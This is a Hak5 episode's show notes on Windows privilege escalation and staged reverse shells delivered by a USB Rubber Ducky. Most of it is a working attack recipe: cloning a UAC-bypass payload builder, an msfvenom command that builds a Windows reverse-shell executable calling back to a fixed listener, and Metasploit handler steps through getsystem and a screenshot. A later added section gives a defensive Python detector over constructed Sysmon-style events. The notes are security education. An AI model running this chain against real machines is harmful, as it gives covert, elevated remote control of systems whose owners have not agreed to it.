Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117

Hak5

Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.

 

Check out patreon.com/threatwire for our Patreon-only Audio RSS feed of Threat Wire!


git clone https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky

cd UAC-D-E-Rubber-Ducky

python uac-duck.py


Upload UAC-Duck-Payload.vbs to your host

Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it onto the MicroSD card for the USB Rubber Ducky.


We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute, so check those episodes out.


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe


Next, we'll upload it to the online host we specified in the Python builder script.


msfconsole

use exploit/multi/handler

set LHOST 192.168.230.133

set LPORT 4444

set ExitOnSession false

exploit -j


sessions

sessions -i 1

shell

whoami

exit

getsystem

shell

whoami

exit

screenshot
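
For defenders, the chain in these notes (a .vbs script, a downloaded executable that connects back to the handler, then a command shell opened through that session) leaves a process and network trail that can be correlated. The following is an added example, not part of the original show notes or the linked project; it runs over constructed, simplified records modelled on Sysmon process-creation (Event ID 1) and network-connection (Event ID 3) events. The record layout, the file paths, and the assumption that the script host is the direct parent of bob.exe are illustrative.

```python
# Constructed, simplified records modelled on Sysmon Event ID 1 (process
# creation) and Event ID 3 (network connection). Not captured from a real host.
# Assumption: the script host (wscript.exe) is the direct parent of bob.exe.
EVENTS = [
    {"id": 1, "guid": "A1", "parent": "E0", "image": r"C:\Windows\System32\wscript.exe"},
    {"id": 1, "guid": "B2", "parent": "A1", "image": r"C:\Users\alice\AppData\Local\Temp\bob.exe"},
    {"id": 3, "guid": "B2", "dst_ip": "192.168.230.133", "dst_port": 4444},
    {"id": 1, "guid": "C3", "parent": "B2", "image": r"C:\Windows\System32\cmd.exe"},
    # Benign control: a browser making an outbound HTTPS connection.
    {"id": 1, "guid": "D4", "parent": "E0", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "guid": "D4", "dst_ip": "203.0.113.10", "dst_port": 443},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_reverse_shell_chains(events):
    """Return one finding per process that was started by a script host,
    opened an outbound TCP connection, and spawned a command shell."""
    procs = {e["guid"]: e for e in events if e["id"] == 1}
    conns = {}
    for e in events:
        if e["id"] == 3:
            conns.setdefault(e["guid"], []).append((e["dst_ip"], e["dst_port"]))
    findings = []
    for guid, proc in procs.items():
        parent = procs.get(proc["parent"])  # None when the parent was not logged
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        if guid not in conns:
            continue  # no outbound connection recorded for this process
        children = {basename(p["image"]) for p in procs.values() if p["parent"] == guid}
        shells = sorted(children & SHELLS)
        if shells:
            findings.append({"image": proc["image"], "remote": conns[guid], "shells": shells})
    return findings


if __name__ == "__main__":
    for finding in find_reverse_shell_chains(EVENTS):
        print(finding)
```

The rule keys on the parent/child and connection relationship rather than on port 4444 or the file name, since both are chosen by whoever builds the payload.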


github.com/SkiddieTech/UAC-D-E-Rubber-Ducky


Enter our December giveaway! Details here: hakshop.com/pages/watchdogs2_giveaway


Shannon's going to CES! Gonna have a meetup during the trade show in Vegas: facebook.com/TekThing/photos/a.314494088749101.1073741828.304982593033584/598542447010929/?type=3&theater


We will be at Shmoocon!